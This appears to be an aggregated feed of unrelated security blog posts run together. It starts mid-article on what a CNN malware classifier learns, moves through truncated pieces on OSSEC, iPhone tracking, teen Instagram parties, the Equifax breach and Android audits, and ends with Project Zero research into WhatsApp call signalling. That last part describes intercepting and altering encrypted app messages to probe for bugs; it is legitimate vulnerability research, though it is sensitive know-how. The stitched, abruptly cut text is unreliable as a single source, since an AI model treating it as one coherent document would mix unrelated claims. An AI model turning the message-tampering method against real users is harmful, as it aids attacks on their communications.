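The fixed-length preprocessing described above can be sketched in a few lines; the padding symbol value and function name here are our own choices for illustration:

```python
INPUT_LEN = 100 * 1024  # the 100KB fixed input length used in this analysis
PAD = 256               # a special padding symbol outside the 0-255 byte range

def to_fixed_length(raw: bytes, length: int = INPUT_LEN, pad: int = PAD):
    """Truncate long files and pad short ones so every input has the same length."""
    symbols = list(raw[:length])
    symbols.extend([pad] * (length - len(symbols)))
    return symbols

small = to_fixed_length(b"MZ\x90\x00")   # a tiny file, padded up to 100KB
large = to_fixed_length(bytes(200_000))  # a 200KB file, truncated to 100KB
```

Using a 257th symbol for padding (rather than reusing 0x00, a byte that legitimately occurs in PE files) lets the embedding layer treat "absent" differently from "null byte".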

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.
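The outlier intuition can be illustrated with a toy nearest-neighbor check in pure Python; HDBSCAN's actual density estimation is far more sophisticated, and the points and threshold below are invented for illustration:

```python
def nearest_neighbor_dist(points, i):
    """Distance from point i to its closest neighbor in 2-D."""
    x, y = points[i]
    return min(((x - px) ** 2 + (y - py) ** 2) ** 0.5
               for j, (px, py) in enumerate(points) if j != i)

def outliers(points, eps):
    """Points with no neighbor within eps: nothing nearby can cheaply replace them."""
    return [i for i in range(len(points))
            if nearest_neighbor_dist(points, i) > eps]

# Three interchangeable points near the origin, plus one isolated point.
pts = [(0.0, 0.0), (0.1, 0.0), (0.0, 0.1), (5.0, 5.0)]
isolated = outliers(pts, eps=1.0)  # only the point at (5.0, 5.0) qualifies
```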

Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown on the right side of Figure 2. Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 is present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.
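The "which file offsets to look at" step might look like the following sketch; `top_activations` is a hypothetical helper, and in practice the activation values come from the first convolutional layer's output:

```python
import heapq

def top_activations(activations, k=100):
    """Return (value, byte offset) pairs for the k strongest filter activations.

    activations[i] is one filter's response at byte offset i; the offsets
    returned are the file positions worth parsing and disassembling.
    """
    return heapq.nlargest(k, ((val, off) for off, val in enumerate(activations)))

# Toy activation trace: the filter fires hardest at offsets 3 and 5.
acts = [0.1, 3.2, 0.0, 5.5, 1.1, 5.5]
hot_spots = top_activations(acts, k=3)
```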

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).

Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.

Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts are shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) are lost, and the classifier treats these as two completely independent features.

Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.
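
The SHAP library exposes this method as `shap.GradientExplainer`. As a rough intuition for what the attributions mean, here is a toy gradient-times-input attribution for a linear scorer; this is our own simplification, not the actual GradientSHAP computation, which averages gradients over noisy interpolations between a baseline and the input:

```python
import numpy as np

def gradient_attributions(weights, x, baseline):
    # For a linear scorer score = w . x, the gradient is just w, so the
    # per-byte attribution is w_i * (x_i - baseline_i): positive values
    # push the score toward "malware", negative toward "goodware".
    return weights * (x - baseline)

w = np.array([0.5, -1.0, 0.0])   # hypothetical per-byte weights
x = np.array([2.0, 2.0, 2.0])    # input bytes (as floats)
attr = gradient_attributions(w, x, np.zeros(3))
```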

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.
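
A check like the virtual-vs-physical size anomaly is easy to express with section metadata from pefile (`Misc_VirtualSize` and `SizeOfRawData`). The 10x threshold below simply echoes the ratio mentioned above, and the function name is our own:

```python
def suspicious_size_ratio(virtual_size, raw_size, threshold=10):
    # Flags a section whose in-memory (virtual) size dwarfs its on-disk
    # size; with pefile, feed in s.Misc_VirtualSize and s.SizeOfRawData.
    if raw_size == 0:
        return virtual_size > 0   # nonzero virtual size, no raw data
    return virtual_size / raw_size > threshold
```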

Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.


In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.


The previous OSSEC articles went through the process of installing OSSEC and deploying a distributed architecture. This article will focus on configuring OSSEC to make better sense of WordPress...


The post OSSEC FOR WEBSITE SECURITY: PART III – Optimizing for WordPress appeared first on PerezBox.

How to turn off location tracking on your iPhone or iPad

Most of us already know that many apps track our location data to better deliver information about local weather, shops, or movie showtimes. A new report from The New York Times, though, reveals that this data is often frighteningly precise and collected up to 14,000 times per day. It’s so precise, in fact, that it’s possible to figure out intimate details of a person’s life merely by studying it. Worse, some apps sell this data to companies who then use it to push hyper-targeted ads to your phones.

Fortunately, the report also demonstrates that we iOS users are better protected than our Android counterparts. Even so, we’re far from immune.


How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle

Teen Parties and Instagram. If your teen is keen to have a party, I can guarantee you that they will not be handing out paper invitations on the playground! It’s all done online now, my friends, and that means it can get very messy.

When my kids were in Primary School, I would make party invitations on Smilebox. It was so easy to personalise your invitation – you could (and still can) add pics and even videos. And then, best of all, you can print them out or email them directly to your guests. Perfect!!

But, unfortunately, my teen boys won’t have a bar of Smilebox. Parties are now organised on Instagram which is definitely not as clean cut as Smilebox.

How Parties are Organised on Instagram

For those of you who aren’t familiar with the process of party organising on Instagram, let me share with you the process. But first, please sit down, it may make your hair stand on end.

  1. Create a private Instagram account that is specifically for the party, e.g. Alex’s 21st Birthday Party. Include a small blurb about the party and encourage interested people to apply – I’m not joking!
  2. Tell a few key friends about the event and have them share the account in their Instagram story. This is to attract like-minded people who might be suitable for the party.
  3. People who are interested in attending the party then request to follow the account. The person holding the party then decides whether they would like the potential guest to attend. They check them out online and see if they are the ‘right fit’. If the potential guest’s request to follow is accepted, this means that they have an invite to the party.

Now, you can just imagine how this could play out. The fact that the party account’s existence is shared by nominated friends means a teen’s entire school year and social circle quickly finds out about the party. And teens want to be included – we’ve all been there – so, of course, many apply to attend. But numbers are limited, so some are inevitably excluded, and in the public arena that is Instagram.

I totally appreciate that you can’t have unlimited numbers to social gatherings, but life in the pre-social media era made this far easier to deal with. You may have known, for example, that your math class buddy, Rebecca, was having a party and that you weren’t invited. But you didn’t have to humiliate yourself by applying, being rejected and then having to view the fabulous images of the night, usually taken by a glossy professional photographer.

Is There Another Way?

No. 4 son recently turned 15 and was super keen for a party. He and I were both determined to avoid this cruel approach to party organising. While he couldn’t have unlimited numbers and couldn’t invite everyone, our aim was to keep it as low-key as possible while trying to avoid hurting kids’ feelings.

So, we went old-school! He invited guests directly. He did use Instagram but each guest received a private message. He did consider doing a group message on Instagram however there was a risk that the guests could add someone into the conversation and share the party details publicly.

And I’m pleased to report that the party went off without a hitch! I think my 2 eldest sons, who were the ‘Security Team’, were a tad disappointed that there were no issues. I was very relieved!

Empathy Is Essential

As a mother of four sons, I am very aware of the importance of robust mental health. The digital world in which our kids are growing up adds a huge layer of complexity and additional pressures to daily life that didn’t exist when we were young. No longer can issues be left at school or on the bus; social media means there is no escape. And it is this constant pressure that is widely documented to be contributing to an increase in anxiety and depression amongst our teens.

It’s no secret that humans are at their most vulnerable during their teenage years. So, I strongly encourage parents of teens to help their offspring rethink their approach to organising social gatherings. Ask them to take a minute to think about how it would feel to be excluded from a party, particularly after having to gather the courage to apply to attend. I know it would have an impact on my self-worth and I’m in my 40’s!! Encourage them to find an alternative way of organising their event.

Digital Parenting Can Be a Tough Gig

Parenting ‘digital natives’ is tough. Our generation of kids has technology running through their veins while we are doing our best to stay up to date. If your teen dismisses your suggestions about party organising and keeps assuring you that they have it ‘all under control’, take a deep breath. Respect for others, empathy and kindness are what you are trying to instill – and these concepts have been around for thousands of years!! So, stay strong!!

Till next time,

Alex xx


The post How To Help Your Teen Organise a Party Online Without It Becoming a Public Spectacle appeared first on McAfee Blogs.

An Avoidable Breach That Could Happen to Any Organization

Following a 14-month investigation into the Equifax breach that affected 148 million consumers around the world, a new report from the House Oversight and Government Reform Committee has concluded that the breach was entirely preventable. According to the report, Equifax “failed to fully appreciate and mitigate its cybersecurity risks” and if it had taken action, “the data breach could have been prevented.”

Hackers exploited a known web vulnerability in the Equifax website built on a Java framework called Apache Struts. It has been reported that attackers were focused on the application that allowed consumers to check their credit rating from the company website, which was a custom-built system created in the 1970s. Struts is commonly used in enterprise applications and a favorite of banks, airlines, and Fortune 1000 companies.

Although a security update to fix the vulnerability was available weeks before the attack, these are complicated to track and update without the appropriate application security testing solutions. What’s more, digital transformation within large, well-established institutions is not a simple process. Modernizing legacy systems takes considerable time, capital, and expertise.

Strengthening Security Practices is the Best Prevention

The Committee’s investigation found several factors led to the hack, including poor security practices and policies, complex and outdated IT systems, and a lack of accountability and management structure. The report notes that Equifax allowed more than 300 security certificates to expire, including 79 certificates for monitoring business critical domains. Further, its failure to renew an expired digital certificate for 19 months left the company without visibility into the theft of the data during the time of the attack.

According to TechCrunch’s Zack Whittaker, the attackers were able to maintain access to the site for more than two months. They were able to move through a number of systems to obtain an unencrypted file of passwords on one server, which gave them access to more than 48 databases that contained unencrypted consumer credit data. Hackers sent more than 9,000 queries on the database and downloaded data on 265 different occasions.

Open Source Risk Is Not a Problem Without a Solution – But You Need the Right Solution

When the Equifax hack was originally announced, Veracode’s Mark Curphey conducted an analysis on the existing code for Apache Struts, uncovering the fact that it was using 11 vulnerable libraries which had 43 security advisories reported against them. One of the libraries contained a high-risk remote execution vulnerability where the vulnerable part was being called. At the time, however, information about this issue (CVE-2017-7525) was marked as Reserved in the National Vulnerability Database – meaning it was not publicly or widely available. Yet SourceClear, acquired by Veracode, had a complete technical write-up available to its users.

This is a perfect example of why simple tools that only look at the source code are not sufficient for open source security testing. The library that was in question was only added to Struts at build-time, and therefore never would have been seen by tools monitoring code repositories like GitHub.

Breaches resulting from hackers having their way with vulnerable open source code are the new normal. Despite this trend, the data in Veracode’s State of Software Security Volume 9, released in October, does not suggest that open source libraries and components – or the way that they are used – are becoming any more secure. Last year, our scan data showed that roughly 88 percent of Java applications contained a component with at least one vulnerability; this year, that figure dipped only marginally to 87.5 percent.

The truth is, vulnerabilities in open source components are highly likely to be exploited, and issues arise because attackers know that a single vulnerability can be found in a wide range of applications. No one is responsible for ensuring security fixes get disclosed – and disclosed directly to organizations using them – leaving it up to each security and development team to stay up-to-date on what needs patching, and making sure that the work is completed. Without implementing a modern Software Composition Analysis solution, maintaining an inventory of what components are in use, where they’re in use, and if they’re configured in such a way that’s easily exploitable is a major challenge.

To learn more about the technical attributes that set Veracode apart from the competition, and how we can help solve your organization’s open source risk, download our whitepaper:

Android security audit: An easy-to-follow annual checklist

Android security is always a hot topic on these here Nets of Inter — and almost always for the wrong reason.

As we've discussed ad nauseam over the years, most of the missives you read about this-or-that super-scary malware/virus/brain-eating-boogie-monster are overly sensationalized accounts tied to theoretical threats with practically zero chance of actually affecting you in the real world. If you look closely, in fact, you'll start to notice that the vast majority of those stories stem from companies that — gasp! — make their money selling malware protection programs for Android phones. (Pure coincidence, right?)


Adventures in Video Conferencing Part 4: What Didn’t Work Out with WhatsApp

Posted by Natalie Silvanovich, Project Zero

Not every attempt to find bugs is successful. When looking at WhatsApp, we spent a lot of time reviewing call signalling hoping to find a remote, interaction-less vulnerability. No such bugs were found. We are sharing our work with the hopes of saving other researchers the time it took to go down this very long road. Or maybe it will give others ideas for vulnerabilities we didn’t find.

As discussed in Part 1, signalling is the process through which video conferencing peers initiate a call. Usually, at least part of signalling occurs before the receiving peer answers the call. This means that if there is a vulnerability in the code that processes incoming signals before the call is answered, it does not require any user interaction.

WhatsApp implements signalling using a series of WhatsApp messages. Opening the WhatsApp binary in IDA shows several native calls that handle incoming signalling messages.


Using apktool to extract the WhatsApp APK, it appears these natives are called from a loop in the com.whatsapp.voipcalling.Voip class. Looking at the smali, it looks like signalling messages are sent as WhatsApp messages via the WhatsApp server, and this loop handles the incoming messages.

Immediately, I noticed that there was a peer-to-peer encrypted portion of the message (the rest of the message is only encrypted peer-to-server). I thought this had the highest potential of reaching bugs, as the server would not be able to sanitize the data. In order to be able to read and alter encrypted packets, I set up a remote server with a python script that opens a socket. Whenever this socket receives data, the data is displayed on the screen, and I have the option of either sending the unaltered packet or altering the packet before it is sent. I then looked for the point in the WhatsApp smali where messages are peer-to-peer encrypted.
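
A minimal version of that interception server might look like the following. The host, port, and hex-based editing interface here are our own choices for illustration, not details from the original setup:

```python
import socket

def maybe_alter(data, edited_hex):
    # Return the operator-supplied replacement, or the original bytes
    # if the operator just pressed enter.
    return bytes.fromhex(edited_hex) if edited_hex else data

def run_intercept_server(host='0.0.0.0', port=9999):
    # Hypothetical port; serves one connection at a time, forever.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(1)
    while True:
        conn, _ = srv.accept()
        data = conn.recv(65536)
        print('received:', data.hex())
        edited = input('hex replacement (blank = send unchanged): ').strip()
        conn.sendall(maybe_alter(data, edited))
        conn.close()
```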

Since WhatsApp uses libsignal for peer-to-peer encryption, I was able to find where messages are encrypted by matching log entries. I then added smali code that sends a packet with the bytes of the message to the server I set up, and then replaces it with the bytes the server returns (changing the size of the byte array if necessary). This allowed me to view and alter the peer-to-peer encrypted message. Making a call using this modified APK, I discovered that the peer-to-peer message was always exactly 24 bytes long, and appeared to be random. I suspected that this was the encryption key used by the call, and confirmed this by looking at the smali.

A single encryption key doesn’t have a lot of potential for malformed data to lead to bugs (I tried lengthening and shortening it to be safe, but got nothing but unexploitable null pointer issues), so I moved on to looking at the peer-to-server encrypted messages. Looking at the Voip loop in smali, it looked like the general flow is that the device receives an incoming message, it is deserialized and if it is of the right type, it is forwarded to the messaging loop. Then certain properties are read from the message, and it is forwarded to a processing function based on its type. Then the processing function reads even more properties, and calls one of the above native methods with the properties as its parameters. Most of these functions have more than 20 parameters.

Many of these functions perform logging when they are called, so by making a test call, I could figure out which functions get called before a call is picked up. It turns out that during a normal incoming call, the device only receives an offer and calls Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer, and then spawns the incoming call screen in WhatsApp. All the other signal types are not used until the call is picked up.

An immediate question I had was whether other signal types are processed if they are received before a call is picked up. Just because the initiating device never sends these signal types before the call is picked up doesn’t mean the receiving device wouldn’t process them if it received them.

Looking through the APK smali, I found the class com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback that has several methods like sendOffer and sendAccept that appeared to send the messages that are processed by these native calls. I changed sendOffer to call other send methods, like sendAccept, instead of its normal messaging functionality. Trying this, I discovered that the Voip loop will process any signal type regardless of whether the call has been answered. The native methods will then parse the parameters, process them and put the results in a buffer, and then call a single method to process the buffer. It is only at that point that processing stops if the message is of the wrong type.

I then reviewed all of the above methods in IDA. The code was very conservatively written, and most needed checks were performed. However, there were a few areas that potentially had bugs that I wanted to investigate further. I decided that changing the parameters to calls in the com.whatsapp.voipcalling.VoiceService$DefaultSignalingCallback class was too slow to test the number of cases I wanted to cover, and went looking for another way to alter the messages.

Ideally, I wanted a way to pass peer-to-server encrypted messages to my server before they were sent, so I could view and alter them. I went through the WhatsApp APK smali looking for a point after serialization but before encryption where I could add my smali function that sends and alters the packets. This was fairly difficult and time consuming, and I eventually put my smali in every method that wrote to a non-file ByteArrayOutputStream in the com.whatsapp.protocol and com.whatsapp.messaging packages (about 10 total) and looked for where it got called. I figured out where it got called, and fixed the class so that anywhere a byte array was written out from a stream, it got sent to my server, and removed the other calls. (If you’re following along at home, the smali file I changed included the string “Double byte dictionary token out of range”, and the two methods I changed contained calls to toByteArray, and ended with invoking a protocol interface.) Looking at what got sent to my server, it seemed like a reasonably comprehensive collection of WhatsApp messages, and the signalling messages contained what I thought they would.

WhatsApp messages are in a compressed XMPP format. A lot of parsers have been written for reverse engineering this protocol, but I found the whatsapp-reveng parser worked the best. I did have to replace the tokens in it with a list extracted from the APK for it to work correctly, though. This made it easier to figure out what was in each packet sent to the server.

Playing with this a bit, I discovered that there are three types of checks in WhatsApp signalling messages. First, the server validates and modifies incoming signalling messages. Secondly, the messages are deserialized, and this can cause errors if the format is incorrect, and generally limits the contents of the Java message object that is passed on. Finally, the native methods perform checks on their parameters.

These additional checks prevented several of the areas I thought were problems from actually being problems. For example, there is a function called by Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOffer that takes in an array of byte arrays, an array of integers and an array of booleans. It uses these values to construct candidates for the call. It checks that the array of byte arrays and the array of integers are of the same length before it loops through them, using values from each, but it does not perform the same check on the boolean array. I thought that this could go out of bounds, but it turns out that the integer and booleans are serialized as a vector of <int,bool> pairs, and the arrays are then copied from the vector, so it is not actually possible to send arrays with different lengths.
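
The reason the mismatch can't happen can be sketched like this: because the integers and booleans travel as one vector of pairs, splitting them back out necessarily yields arrays of equal length. This is a simplified model of the deserialization, in Python rather than the native code:

```python
def split_pairs(pairs):
    # The <int,bool> pairs are deserialized into two parallel arrays, so
    # the arrays handed to the candidate-building code always have equal
    # length; this closes off the suspected out-of-bounds read.
    ints = [i for i, _ in pairs]
    bools = [b for _, b in pairs]
    return ints, bools
```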

One area of the signalling messages that looked especially concerning was the voip_options field of the message. This field is never sent from the sending device, but is added to the message by the server before it is forwarded to the receiving device. It is a buffer in JSON format that is processed by the receiving device and contains dozens of configuration parameters.

{"aec":{"offset":"0","mode":"2","echo_detector_mode":"4","echo_detector_impl":"2","ec_threshold":"50","ec_off_threshold":"40","disable_agc":"1","algorithm":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"aecm_adapt_step_size":"2"},"agc":{"mode":"0","limiterenable":"1","compressiongain":"9","targetlevel":"1"},"bwe":{"use_audio_packet_rate":"1","delay_based_bwe_trendline_filter_enabled":"1","delay_based_bwe_bitrate_estimator_enabled":"1","bwe_impl":"5"},"encode":{"complexity":"5","cbr":"0"},"init_bwe":{"use_local_probing_rx_bitrate":"1","test_flags":"982188032","max_tx_rott_based_bitrate":"128000","max_bytes":"8000","max_bitrate":"350000"},"ns":{"mode":"1"},"options":{"connecting_tone_desc": "test","video_codec_priority":"2","transport_stats_p2p_threshold":"0.5","spam_call_threshold_seconds":"55","mtu_size":"1200","media_pipeline_setup_wait_threshold_in_msec":"1500","low_battery_notify_threshold":"5","ip_config":"1","enc_fps_over_capture_fps_threshold":"1","enable_ssrc_demux":"1","enable_preaccept_received_update":"1","enable_periodical_aud_rr_processing":"1","enable_new_transport_stats":"1","enable_group_call":"1","enable_camera_abtest_texture_preview":"1","enable_audio_video_switch":"1","caller_end_call_threshold":"1500","call_start_delay":"1200","audio_encode_offload":"1","android_call_connected_toast":"1"}
Sample voip_options (truncated)

If a peer could send a voip_options parameter to another peer, it would open up a lot of attack surface, including a JSON parser and the processing of these parameters. Since this parameter almost always appears in an offer, I tried modifying an offer to contain one, but the offer was rejected by the WhatsApp server with error 403. Looking at the binary, there were three other signal types in the incoming call flow that could accept a voip_options parameter. Java_com_whatsapp_voipcalling_Voip_nativeHandleCallOfferAccept and Java_com_whatsapp_voipcalling_Voip_nativeHandleCallVideoChanged were accepted by the server if a voip_options parameter was included, but it was stripped before the message was sent to the peer. However, if a voip_options parameter was attached to a Java_com_whatsapp_voipcalling_Voip_nativeHandleCallGroupInfo message, it would be forwarded to the peer device. I confirmed this by sending malformed JSON and looking at the log of the receiving device for an error.

The voip_options parameter is processed by WhatsApp in three stages. First, the JSON is parsed into a tree. Then the tree is transformed into a map, so JSON object properties can be looked up efficiently even though there are dozens of them. Finally, WhatsApp goes through the map, looking for specific parameters and processing them, usually copying them to an area in memory where they will set a value relevant to the call being made.
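
The three stages can be sketched in Python. This is purely illustrative: the dotted-path key scheme, the function names, and the use of a plain dict (rather than the FarmHash-based slab described below) are my assumptions, not WhatsApp's actual implementation.

```python
import json

def flatten(node, prefix="", out=None):
    """Flatten a parsed JSON tree into a single flat map so that
    deeply nested properties can be looked up by a dotted path."""
    if out is None:
        out = {}
    if isinstance(node, dict):
        for key, value in node.items():
            flatten(value, prefix + key + ".", out)
    else:
        out[prefix.rstrip(".")] = node
    return out

# Stage 1: parse the JSON into a tree.
tree = json.loads('{"agc": {"mode": "0", "targetlevel": "1"}}')

# Stage 2: transform the tree into a map for efficient lookup.
params = flatten(tree)

# Stage 3: look for specific parameters and copy them into call state.
call_state = {"agc_mode": int(params.get("agc.mode", "0"))}
```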

Starting with the JSON parser, I quickly recognized it as the PJSIP JSON parser. I compiled that code and fuzzed it, and found only one minor out-of-bounds read issue.

I then looked at the conversion of the JSON tree output from the parser into the map. The map is a very efficient structure. It is a hash map that uses FarmHash as its hashing algorithm, and it is designed so that the entire map is stored in a single slab of memory, even if the JSON objects are deeply nested. I looked at many open source projects that contain similar structures, but could not find one that matched this implementation. I looked through the creation of this structure in great detail, looking especially for type confusion bugs as well as errors when the memory slab is expanded, but did not find any issues.

I also looked at the functions that go through the map and handle specific parameters. These functions are extremely long, and I suspect they are generated using a code generation tool such as bison. They mostly copy parameters into static areas of memory, at which point they become difficult to trace. I did not find any bugs in this area either. Other than going through parameter names and looking for values that seemed likely to cause problems, I did not do any analysis of how the values fetched from JSON are actually used. One parameter that seemed especially promising was an A/B test parameter called setup_video_stream_before_accept. I hoped that setting this would allow the device to accept RTP before the call is answered, which would make RTP bugs interaction-less, but I was unable to get this to work.

